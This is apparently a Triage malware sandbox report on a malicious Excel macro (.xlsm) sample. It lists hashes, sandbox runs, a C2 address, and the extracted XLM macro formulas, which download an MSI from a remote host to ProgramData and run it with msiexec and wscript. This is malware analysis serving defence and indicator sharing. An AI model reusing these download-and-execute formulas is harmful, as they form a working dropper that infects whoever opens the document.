0fe2799c2a3c64d7f4a4ed2ba8992538 | Triage

Submit
Reports

Overview

overview

Static

static

0fe2799c2a...8.xlsm

windows7-x64

0fe2799c2a...8.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

0fe2799c2a3c64d7f4a4ed2ba8992538.xlsm

Resource

win7-20231129-en

windows7-x64

8 signatures

150 seconds

Behavioral task

behavioral2

Sample

0fe2799c2a3c64d7f4a4ed2ba8992538.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

8 signatures

150 seconds

General

Target

0fe2799c2a3c64d7f4a4ed2ba8992538
Size

6KB
MD5

0fe2799c2a3c64d7f4a4ed2ba8992538
SHA1

cf85dcfafc3b70fe8278d94fca3a6e787b60cd86
SHA256

92ff0261aa5ba46511c1bdc9e40b348e7296efcbc8124b21db4f7e7ad69dd97e
SHA512

1d528d9cae734594d6e834afc80393dec7c4779d49fda076893bd693ec5c53eb65a929be09d460c3a6e92f6826797a248d185674328069174e8c4e499160f7ef
SSDEEP

192:NDSTuSj1aEOmmfR48UhHFBFYu2b98y6ufk:NgumwS1FY7b98y6ik

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187

Attributes

formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Signatures

Files

0fe2799c2a3c64d7f4a4ed2ba8992538
.xlsm office2007

© 2018-2025

Terms | Privacy